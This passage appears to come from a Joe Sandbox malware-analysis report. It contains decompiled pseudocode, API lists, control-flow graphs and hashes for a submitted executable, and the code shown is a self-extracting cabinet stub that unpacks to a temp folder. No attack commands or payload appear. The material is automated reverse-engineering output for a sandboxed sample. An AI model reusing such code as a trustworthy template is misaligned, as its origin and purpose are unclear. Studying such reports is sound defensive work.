                                                                                                                                                                                                          									if((_v804 & 0x00000001) == 0) {
                                                                                                                                                                                                          										__eflags = _t103 - _t116;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eflags = _t110 - _t116;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									__eflags = _t103 + _t110 - _t116;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags <= 0) {
                                                                                                                                                                                                          									 *0x869124 = 0;
                                                                                                                                                                                                          									_t66 = 1;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t66 = E0086268B(_a4, _t110, _t103,  &_v16);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L32;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							__eflags = _v816 & 0x00008000;
                                                                                                                                                                                                          							if((_v816 & 0x00008000) == 0) {
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t105 =  *0x869a38; // 0x0
                                                                                                                                                                                                          							_t110 =  *((intOrPtr*)(0x8689e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x8689e0 + (_t78 & 0x0000ffff) * 4));
                                                                                                                                                                                                          							_t103 = (_t105 >> 2) +  *0x869a38;
                                                                                                                                                                                                          							goto L21;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t110 = 0x4c5;
                                                                                                                                                                                                          						E008644B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						goto L31;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                          					_t110 = 0x4f9;
                                                                                                                                                                                                          					goto L30;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t110 = 0x4bc;
                                                                                                                                                                                                          					E008644B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					_t66 = 0;
                                                                                                                                                                                                          					L33:
                                                                                                                                                                                                          					return E00866CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}



































                                                                                                                                                                                                          0x00865aeb
                                                                                                                                                                                                          0x00865af0
                                                                                                                                                                                                          0x00865af6
                                                                                                                                                                                                          0x00865af8
                                                                                                                                                                                                          0x00865af9
                                                                                                                                                                                                          0x00865af9
                                                                                                                                                                                                          0x00865afb
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865afd
                                                                                                                                                                                                          0x00865aff
                                                                                                                                                                                                          0x00865b00
                                                                                                                                                                                                          0x00865b03
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b03
                                                                                                                                                                                                          0x00865b05
                                                                                                                                                                                                          0x00865b08
                                                                                                                                                                                                          0x00865b20
                                                                                                                                                                                                          0x00865b27
                                                                                                                                                                                                          0x00865b52
                                                                                                                                                                                                          0x00865b52
                                                                                                                                                                                                          0x00865b5b
                                                                                                                                                                                                          0x00865b62
                                                                                                                                                                                                          0x00865b6b
                                                                                                                                                                                                          0x00865b6d
                                                                                                                                                                                                          0x00865b76
                                                                                                                                                                                                          0x00865b7d
                                                                                                                                                                                                          0x00865b83
                                                                                                                                                                                                          0x00865b7f
                                                                                                                                                                                                          0x00865b7f
                                                                                                                                                                                                          0x00865b7f
                                                                                                                                                                                                          0x00865b6f
                                                                                                                                                                                                          0x00865b72
                                                                                                                                                                                                          0x00865b72
                                                                                                                                                                                                          0x00865b85
                                                                                                                                                                                                          0x00865b98
                                                                                                                                                                                                          0x00865b9e
                                                                                                                                                                                                          0x00865b87
                                                                                                                                                                                                          0x00865b8f
                                                                                                                                                                                                          0x00865b8f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b85
                                                                                                                                                                                                          0x00865b29
                                                                                                                                                                                                          0x00865b33
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b35
                                                                                                                                                                                                          0x00865b48
                                                                                                                                                                                                          0x00865b4a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b4a
                                                                                                                                                                                                          0x00865b0f
                                                                                                                                                                                                          0x00865b16
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865b16
                                                                                                                                                                                                          0x00865a7c
                                                                                                                                                                                                          0x00865a8a
                                                                                                                                                                                                          0x00865aa5
                                                                                                                                                                                                          0x00865aab
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008659bb
                                                                                                                                                                                                          0x008659c0
                                                                                                                                                                                                          0x008659c7
                                                                                                                                                                                                          0x008659d1
                                                                                                                                                                                                          0x008659d6
                                                                                                                                                                                                          0x00865c05
                                                                                                                                                                                                          0x00865c14
                                                                                                                                                                                                          0x00865c14

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008659A8
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(?), ref: 008659AF
                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00865A13
                                                                                                                                                                                                          • MulDiv.KERNEL32(?,?,00000400), ref: 00865A40
                                                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00865A64
                                                                                                                                                                                                          • memset.MSVCRT ref: 00865A7C
                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00865A98
                                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00865AA5
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00865BFC
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4237285672-0
                                                                                                                                                                                                          • Opcode ID: 7e66c4d7e2375731a62f98ee08c74d5c4f08ecb4ade5aa82faa5f82c09e61a4d
                                                                                                                                                                                                          • Instruction ID: df7d1d3016f0261925ef8f6be6f8bce8509fa20ac6340a4123212b82558b4b5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e66c4d7e2375731a62f98ee08c74d5c4f08ecb4ade5aa82faa5f82c09e61a4d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F71AFB190061CAFEB259F64DC85FFA77ACFB48304F1651A9F446D6280EA709E848F61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          control_flow_graph 374 864fe0-86501a call 86468f FindResourceA LoadResource LockResource 377 865020-865027 374->377 378 865161-865163 374->378 379 865057-86505e call 864efd 377->379 380 865029-865051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 865060-865077 call 8644b9 379->383 384 86507c-8650b4 379->384 380->379 388 865107-86510e 383->388 389 8650b6-8650da 384->389 390 8650e8-865104 call 8644b9 384->390 391 865110-865117 FreeResource 388->391 392 86511d-86511f 388->392 398 865106 389->398 402 8650dc 389->402 390->398 391->392 395 865121-865127 392->395 396 86513a-865141 392->396 395->396 399 865129-865135 call 8644b9 395->399 400 865143-86514a 396->400 401 86515f 396->401 398->388 399->396 400->401 404 86514c-865159 SendMessageA 400->404 401->378 405 8650e3-8650e6 402->405 404->401 405->390 405->398
                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00864FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                          				struct HWND__* _t9;
                                                                                                                                                                                                          				int _t10;
                                                                                                                                                                                                          				void* _t12;
                                                                                                                                                                                                          				struct HWND__* _t24;
                                                                                                                                                                                                          				struct HWND__* _t27;
                                                                                                                                                                                                          				intOrPtr _t29;
                                                                                                                                                                                                          				void* _t33;
                                                                                                                                                                                                          				int _t34;
                                                                                                                                                                                                          				CHAR* _t36;
                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t33 = __edi;
                                                                                                                                                                                                          				_t36 = "CABINET";
                                                                                                                                                                                                          				 *0x869144 = E0086468F(_t36, 0, 0);
                                                                                                                                                                                                          				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                          				 *0x869140 = _t8;
                                                                                                                                                                                                          				if(_t8 == 0) {
                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t9 =  *0x868584; // 0x0
                                                                                                                                                                                                          				if(_t9 != 0) {
                                                                                                                                                                                                          					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                          					ShowWindow(GetDlgItem( *0x868584, 0x841), 5);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t10 = E00864EFD(0, 0);
                                                                                                                                                                                                          				if(_t10 != 0) {
                                                                                                                                                                                                          					__imp__#20(E00864CA0, E00864CC0, E00864980, E00864A50, E00864AD0, E00864B60, E00864BC0, 1, 0x869148, _t33);
                                                                                                                                                                                                          					_t34 = _t10;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                          						_t29 =  *0x869148; // 0x0
                                                                                                                                                                                                          						_t24 =  *0x868584; // 0x0
                                                                                                                                                                                                          						E008644B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						_t37 = 0;
                                                                                                                                                                                                          						L9:
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__imp__#22(_t34, "*MEMCAB", 0x861140, 0, E00864CD0, 0, 0x869140); // executed
                                                                                                                                                                                                          					_t37 = _t10;
                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					__imp__#23(_t34); // executed
                                                                                                                                                                                                          					if(_t10 != 0) {
                                                                                                                                                                                                          						goto L9;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t27 =  *0x868584; // 0x0
                                                                                                                                                                                                          					E008644B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					_t37 = 0;
                                                                                                                                                                                                          					L10:
                                                                                                                                                                                                          					_t12 =  *0x869140; // 0x0
                                                                                                                                                                                                          					if(_t12 != 0) {
                                                                                                                                                                                                          						FreeResource(_t12);
                                                                                                                                                                                                          						 *0x869140 = 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                          						_t47 =  *0x8691d8; // 0x0
                                                                                                                                                                                                          						if(_t47 == 0) {
                                                                                                                                                                                                          							E008644B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(( *0x868a38 & 0x00000001) == 0 && ( *0x869a34 & 0x00000001) == 0) {
                                                                                                                                                                                                          						SendMessageA( *0x868584, 0xfa1, _t37, 0);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					return _t37;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          			}

















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00864FFE
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 00865006
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0086500D
                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,00000842), ref: 00865030
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00865037
                                                                                                                                                                                                          • GetDlgItem.USER32(00000841,00000005), ref: 0086504A
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00865051
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00865111
                                                                                                                                                                                                          • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00865159
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                          • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                          • API String ID: 1305606123-2642027498
                                                                                                                                                                                                          • Opcode ID: a32654f5b712050b269d6836313ba3a21d4681fef072947346c1f8a102534bfb
                                                                                                                                                                                                          • Instruction ID: dddf5de5dfc9953196955a43eb4e50849161f9d9a068b2e09537eac3cec3b816
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a32654f5b712050b269d6836313ba3a21d4681fef072947346c1f8a102534bfb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE31D3B0640711FBD7205B65AD8EF2B365CF706B55F072024F916E63E1DAF98C408A62
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 406 862f1d-862f3d 407 862f3f-862f46 406->407 408 862f6c-862f73 call 865164 406->408 409 862f5f-862f66 call 863a3f 407->409 410 862f48 call 8651e5 407->410 415 863041 408->415 416 862f79-862f80 call 8655a0 408->416 409->408 409->415 417 862f4d-862f4f 410->417 420 863043-863053 call 866ce0 415->420 416->415 424 862f86-862fbe GetSystemDirectoryA call 86658a LoadLibraryA 416->424 417->415 421 862f55-862f5d 417->421 421->408 421->409 428 862ff7-863004 FreeLibrary 424->428 429 862fc0-862fd4 GetProcAddress 424->429 431 863006-86300c 428->431 432 863017-863024 SetCurrentDirectoryA 428->432 429->428 430 862fd6-862fee DecryptFileA 429->430 430->428 442 862ff0-862ff5 430->442 431->432 435 86300e call 86621e 431->435 433 863026-86303c call 8644b9 call 866285 432->433 434 863054-86305a 432->434 433->415 438 863065-86306c 434->438 439 86305c call 863b26 434->439 446 863013-863015 435->446 444 86306e-863075 call 86256d 438->444 445 86307c-863089 438->445 451 863061-863063 439->451 442->428 452 86307a 444->452 448 8630a1-8630a9 445->448 449 86308b-863091 445->449 446->415 446->432 455 8630b4-8630b7 448->455 456 8630ab-8630ad 448->456 449->448 453 863093 call 863ba2 449->453 451->415 451->438 452->445 459 863098-86309a 453->459 455->420 456->455 458 8630af call 864169 456->458 458->455 459->415 461 86309c 459->461 461->448
                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E00862F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v272;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t9;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				struct HWND__* _t12;
                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                          				signed int _t25;
                                                                                                                                                                                                          				intOrPtr* _t26;
                                                                                                                                                                                                          				signed int _t27;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                          				struct HINSTANCE__* _t36;
                                                                                                                                                                                                          				intOrPtr _t41;
                                                                                                                                                                                                          				intOrPtr* _t44;
                                                                                                                                                                                                          				signed int _t46;
                                                                                                                                                                                                          				int _t47;
                                                                                                                                                                                                          				void* _t58;
                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t43 = __edx;
                                                                                                                                                                                                          				_t9 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                          				if( *0x868a38 != 0) {
                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                          					_t11 = E00865164(_t52);
                                                                                                                                                                                                          					_t53 = _t11;
                                                                                                                                                                                                          					if(_t11 == 0) {
                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                          						_t12 = 0;
                                                                                                                                                                                                          						L17:
                                                                                                                                                                                                          						return E00866CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t14 = E008655A0(_t53); // executed
                                                                                                                                                                                                          					if(_t14 == 0) {
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t45 = 0x105;
                                                                                                                                                                                                          						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                          						_t43 = 0x105;
                                                                                                                                                                                                          						_t40 =  &_v272;
                                                                                                                                                                                                          						E0086658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                          						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                          						_t44 = 0;
                                                                                                                                                                                                          						if(_t36 != 0) {
                                                                                                                                                                                                          							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                          							_v276 = _t31;
                                                                                                                                                                                                          							if(_t31 != 0) {
                                                                                                                                                                                                          								_t45 = _t47;
                                                                                                                                                                                                          								_t40 = _t31;
                                                                                                                                                                                                          								 *0x86a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                          								_v276();
                                                                                                                                                                                                          								if(_t47 != _t47) {
                                                                                                                                                                                                          									_t40 = 4;
                                                                                                                                                                                                          									asm("int 0x29");
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						FreeLibrary(_t36);
                                                                                                                                                                                                          						_t58 =  *0x868a24 - _t44; // 0x0
                                                                                                                                                                                                          						if(_t58 != 0) {
                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                          							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                          							if(_t21 != 0) {
                                                                                                                                                                                                          								__eflags =  *0x868a2c - _t44; // 0x0
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									L20:
                                                                                                                                                                                                          									__eflags =  *0x868d48 & 0x000000c0;
                                                                                                                                                                                                          									if(( *0x868d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                          										_t41 =  *0x869a40; // 0x3, executed
                                                                                                                                                                                                          										_t26 = E0086256D(_t41); // executed
                                                                                                                                                                                                          										_t44 = _t26;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t22 =  *0x868a24; // 0x0
                                                                                                                                                                                                          									 *0x869a44 = _t44;
                                                                                                                                                                                                          									__eflags = _t22;
                                                                                                                                                                                                          									if(_t22 != 0) {
                                                                                                                                                                                                          										L26:
                                                                                                                                                                                                          										__eflags =  *0x868a38;
                                                                                                                                                                                                          										if( *0x868a38 == 0) {
                                                                                                                                                                                                          											__eflags = _t22;
                                                                                                                                                                                                          											if(__eflags == 0) {
                                                                                                                                                                                                          												E00864169(__eflags);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t12 = 1;
                                                                                                                                                                                                          										goto L17;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										__eflags =  *0x869a30 - _t22; // 0x0
                                                                                                                                                                                                          										if(__eflags != 0) {
                                                                                                                                                                                                          											goto L26;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t25 = E00863BA2(); // executed
                                                                                                                                                                                                          										__eflags = _t25;
                                                                                                                                                                                                          										if(_t25 == 0) {
                                                                                                                                                                                                          											goto L16;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t22 =  *0x868a24; // 0x0
                                                                                                                                                                                                          										goto L26;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_t27 = E00863B26(_t40, _t44);
                                                                                                                                                                                                          								__eflags = _t27;
                                                                                                                                                                                                          								if(_t27 == 0) {
                                                                                                                                                                                                          									goto L16;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t43 = 0x4bc;
                                                                                                                                                                                                          							E008644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                          							 *0x869124 = E00866285();
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t59 =  *0x869a30 - _t44; // 0x0
                                                                                                                                                                                                          						if(_t59 != 0) {
                                                                                                                                                                                                          							goto L14;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t30 = E0086621E(); // executed
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							goto L16;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L14;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t49 =  *0x868a24;
                                                                                                                                                                                                          				if( *0x868a24 != 0) {
                                                                                                                                                                                                          					L4:
                                                                                                                                                                                                          					_t34 = E00863A3F(_t51);
                                                                                                                                                                                                          					_t52 = _t34;
                                                                                                                                                                                                          					if(_t34 == 0) {
                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(E008651E5(_t49) == 0) {
                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t51 =  *0x868a38;
                                                                                                                                                                                                          				if( *0x868a38 != 0) {
                                                                                                                                                                                                          					goto L5;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L4;
                                                                                                                                                                                                          			}


                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32 ref: 00862F93
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00862FB2
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00862FC6
                                                                                                                                                                                                          • DecryptFileA.ADVAPI32 ref: 00862FE6
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00862FF8
                                                                                                                                                                                                          • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0086301C
                                                                                                                                                                                                            • Part of subcall function 008651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00862F4D,?,00000002,00000000), ref: 00865201
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                          • API String ID: 2126469477-58291647
                                                                                                                                                                                                          • Opcode ID: 5d4c6f5142dc3ba9fe765cc3735b9c2731b284b6bf49429297e4f7026d741b13
                                                                                                                                                                                                          • Instruction ID: 170d0cf8bc73d3e4555e52a0429d9e29c0a52febeb41234f7cb7408f72e67696
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d4c6f5142dc3ba9fe765cc3735b9c2731b284b6bf49429297e4f7026d741b13
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4141FB30A00A15DBDB30AB75AC4AA5633E8FB54751F131165ED45D2192EFB4CE84CB63
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 478 865467-865484 479 86551c-865528 call 861680 478->479 480 86548a-865490 call 8653a1 478->480 484 86552d-865539 call 8658c8 479->484 483 865495-865497 480->483 485 865581-865583 483->485 486 86549d-8654c0 call 861781 483->486 493 86554d-865552 484->493 494 86553b-865545 CreateDirectoryA 484->494 488 86558d-86559d call 866ce0 485->488 495 8654c2-8654d8 GetSystemInfo 486->495 496 86550c-86551a call 86658a 486->496 500 865554-865557 call 86597d 493->500 501 865585-86558b 493->501 498 865577-86557c call 866285 494->498 499 865547 494->499 504 8654fe 495->504 505 8654da-8654dd 495->505 496->484 498->485 499->493 511 86555c-86555e 500->511 501->488 512 865503-865507 call 86658a 504->512 509 8654f7-8654fc 505->509 510 8654df-8654e2 505->510 509->512 514 8654e4-8654e7 510->514 515 8654f0-8654f5 510->515 511->501 516 865560-865566 511->516 512->496 514->496 518 8654e9-8654ee 514->518 515->512 516->485 517 865568-865575 RemoveDirectoryA 516->517 517->485 518->512
                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                          			E00865467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				struct _SYSTEM_INFO _v304;
